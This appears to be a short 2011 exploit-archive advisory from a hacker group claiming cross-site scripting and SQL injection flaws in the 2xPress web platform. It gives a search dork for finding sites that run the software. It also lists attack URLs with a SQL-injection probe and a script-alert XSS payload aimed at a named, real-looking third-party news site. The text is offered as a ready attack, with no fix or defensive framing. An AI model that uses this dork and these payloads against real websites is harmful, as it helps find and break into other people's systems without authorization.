2xPress suffers from cross site scripting and remote SQL injection vulnerabilities.
5620c3c831e386ab5fadb62cf17015ddc82590a7bbadfd4f56fd99093441d0d6
# Exploit Title: 2xPress Web Multiple Vulnerability
# Date: 08/12/2011 - 23:32
# Author: 3spi0n
# Software Website: http://www.2xpress.com/
# Tested On: BackTrack 5 - Win7 Ultimate
# Platform: Php
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
[$] Dorks: "Developed by 2xpress.com"
[#] Vulnerable File : All
[$] Demo Sites:
[~] http://www.humormillnews.com/hmill/read.php?id=1" [PhpSQLi]
[~] http://www.humormillnews.com/hmill/read.php?id=><script>alert('XSS')</script>
[XSS]
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
# Dar bi Koridor Benimki, Kendimi Aradigim.
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
# Contact: Twitter.Com/RigidusCO - Facebook.Com/3spi0ne
# Greetz: DarkDevilz.in - 3spi0n.net
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
- Mr.PaPaRoSSe And 3spi0n -
# DarkDevilz - Defence And Destruction Group'z - TURKEY #
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>